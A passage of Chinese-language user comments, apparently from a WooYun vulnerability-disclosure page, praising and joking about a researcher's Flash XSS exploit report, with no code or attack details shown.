  145. 2014-03-17 10:55 | bombless ( 路人 | Rank:5 漏洞数:1 | 熟悉x86汇编、C语言及系统编程。实战经验较...)

    好像很屌啊,过段时间看视频学习一下。

  146. 2014-03-25 10:57 | 寒风 ( 路人 | Rank:21 漏洞数:2 | http://www.wooyun.org/)

    炫酷狂拽吊炸天!

  147. 2014-03-27 21:01 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    碉堡了

  148. 2014-03-27 23:31 | 宇少 ( 普通白帽子 | Rank:106 漏洞数:41 | Jyhack-TeaM:bbs.jyhack.com 群:308694453...)

    哇靠,叼!

  149. 2014-03-28 13:26 | Elegance ( 实习白帽子 | Rank:48 漏洞数:3 | 此人很懒,什么话都没留下!)

    XSS能产生什么样的危害,就看发现者的JS编写水平了。只是有时候懒得写,就被认为只是个XSS而已!

  150. 2014-03-28 14:21 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    真经典、、、

  151. 2014-03-28 14:23 | alou ( 路人 | Rank:0 漏洞数:3 | PHP屌丝一枚)

    楼上楼下都是逗逼,鉴定完毕。

  152. 2014-03-28 18:51 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    二哥好腻害~我要给你生孩子

  153. 2014-03-28 19:27 | sdc1992 ( 实习白帽子 | Rank:32 漏洞数:12 )

    终于可以看了,好厉害,长见识了……

  154. 2014-03-29 13:20 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    点了那个网页了,电脑已植入xss代码,求二哥放过。

  155. 2014-03-30 10:59 | terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)

    点了那个网页了,电脑已植入xss代码,求二哥放过。

  156. 2014-03-30 11:28 | sdc1992 ( 实习白帽子 | Rank:32 漏洞数:12 )

    对呀,我们被植入的那个代码然后怎么办?

  157. 2014-03-30 18:36 | 蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )

    点了那个网页了,电脑已植入xss代码,求二哥放过。

  158. 2014-04-01 14:48 | 革命往事 ( 路人 | Rank:17 漏洞数:2 | 革命已成往事)

    点了那个网页,被植入xss代码了,怎么清除哇

  159. 2014-04-01 14:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小火苗 代清理 1wb 一个

  160. 2014-04-02 00:08 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    @xsser 大家快来看啊,剑心站长以办理新业务的方式来要挟乌云小彩笔啊,敲诈金额高达1wb

  161. 2014-04-02 00:08 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    @xsser 幸亏当时用的safari没有Flash插件,哎呀,我真明智,剑心哥哥,让你失望了,嘿嘿

  162. 2014-04-04 08:06 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    我默默的看完了全文,然后另存为了整个页面。

  163. 2014-04-04 09:44 | ylaxfcy ( 普通白帽子 | Rank:178 漏洞数:28 | 技术无黑白,但是人有)

    不给5w的话真是不幸福

  164. 2014-04-07 21:28 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    真心感觉牛逼,真心佩服

  165. 2014-04-08 14:29 | 倒霉熊 ( 路人 | Rank:20 漏洞数:6 | *好简要)

    做淘宝客的时候就是用阿里装修里面的flash xss 可惜阿里修复来修复去还是一个样子

  166. 2014-04-08 14:46 | pkGFW ( 路人 | Rank:3 漏洞数:1 | |先从安全意识做起)

    10w

  167. 2014-04-08 17:42 | 指尖的温度 ( 路人 | Rank:12 漏洞数:7 )

    吊的不像样子

  168. 2014-04-08 21:32 | 光的传人 ( 普通白帽子 | Rank:106 漏洞数:22 | IT爱好者~)

    点了那个网页了,电脑已植入xss代码,求二哥放过。怎么清除电脑的rootkit???

  169. 2014-04-09 20:29 | 那些花 ( 路人 | Rank:2 漏洞数:4 | 怀念那些花,那么美!)

    不错!牛叉

  170. 2014-04-16 10:08 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    赞二哥的exploit

  171. 2014-04-17 13:32 | 灰帽子 ( 实习白帽子 | Rank:67 漏洞数:12 | 白帽子)

    好多W

  172. 2014-04-18 14:20 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    目测 乌云二哥粉丝最多。

  173. 2014-04-23 23:07 | bitcoin ( 普通白帽子 | Rank:715 漏洞数:218 | 学习是最好的投资!)

    牛人啊

  174. 2014-06-03 12:53 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    二哥请吃饭啊

  175. 2014-09-30 17:27 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    膜拜啊

  176. 2015-04-16 17:11 | 3ky7in4 ( 路人 | Rank:4 漏洞数:2 | Just for fun)

    越来越喜欢wooyun,玩xss的真猥琐